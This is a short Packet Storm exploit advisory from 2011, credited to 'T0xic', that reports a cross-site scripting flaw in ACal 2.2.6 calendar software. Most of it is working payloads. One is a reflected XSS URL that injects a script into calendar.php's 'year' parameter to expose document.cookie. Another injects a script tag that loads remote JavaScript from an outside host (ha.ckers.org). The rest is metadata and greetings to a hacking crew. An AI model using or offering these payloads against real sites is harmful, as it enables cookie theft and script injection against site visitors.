ACal 2.2.6 Cross Site Scripting

2011-09-02T00:00:00
ID PACKETSTORM:104742
Type packetstorm
Reporter T0xic
Modified 2011-09-02T00:00:00

Description

                                        
                                            `=================================================================  
=ACal-2.2.6 XSS Vulnerability  
=================================================================  
  
# Exploit Title: ACal-2.2.6 XSS Vulnerability  
# Date: 02.09.2011  
# Author: T0xic  
# Category: webapps/0day  
# Script url: http://acalproj.sourceforge.net/  
# Version: N/A  
# Tested on:  
# CVE :   
  
[ EXPL0!T ]  
  
=> http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script>  
  
  
Exemple exploit code :  
  
=> “><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><”  
  
#================[ Exploited By T0xic ]================  
#Greets To : Dz Offenders Cr3w < Algerians HaCkerS > =  
#======================================================  
`